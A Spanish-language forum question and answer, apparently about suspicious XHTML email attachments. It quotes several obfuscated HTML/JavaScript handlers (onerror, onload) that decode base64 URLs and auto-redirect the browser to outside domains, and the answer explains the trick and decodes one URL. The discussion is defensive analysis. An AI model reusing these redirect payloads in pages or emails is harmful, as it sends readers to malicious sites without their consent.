Recibo correos electrónicos con algunos archivos xhtml . Encuentro que estos archivos son sospechosos. Contienen código JS:
<video src="123" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));"> <img src="awbdsdrDYZZZCN33.jpg" onerror="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MzEyNjg4ODA3NjM3Mzc1NzEg');"> <body onload="document.location.replace(window.atob('aHR0cDovL3J1c25nLnByby80d1FKZEQ/NTU2MzQ2NzY1MzIwNjI1MSA='));" /> <link rel="stylesheet" type="text/css" href="1.css" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NDg0NDUwNTc4NzAxMjMyIA=='));" /> <body onload="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MTE1MzQ1MDI0NTExMDQ2NzM0NCA=');" />Me pregunto qué tan maliciosos son estos códigos. ¿Y qué acción hacen estos archivos con el sistema operativo?
Te redirige a http://keitaro0001.pro/DcLtdS?7324243812487758 .
Utiliza a propósito una propiedad src incorrecta para activar el evento de error (ya que el archivo en esa fuente no existe), ejecutando el JS en el atributo onerror :
document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA=')); La cadena en cuestión está codificada en base64. window.atob decodifica la cadena codificada en base64 (que es la URL anterior) y la asigna a la URL.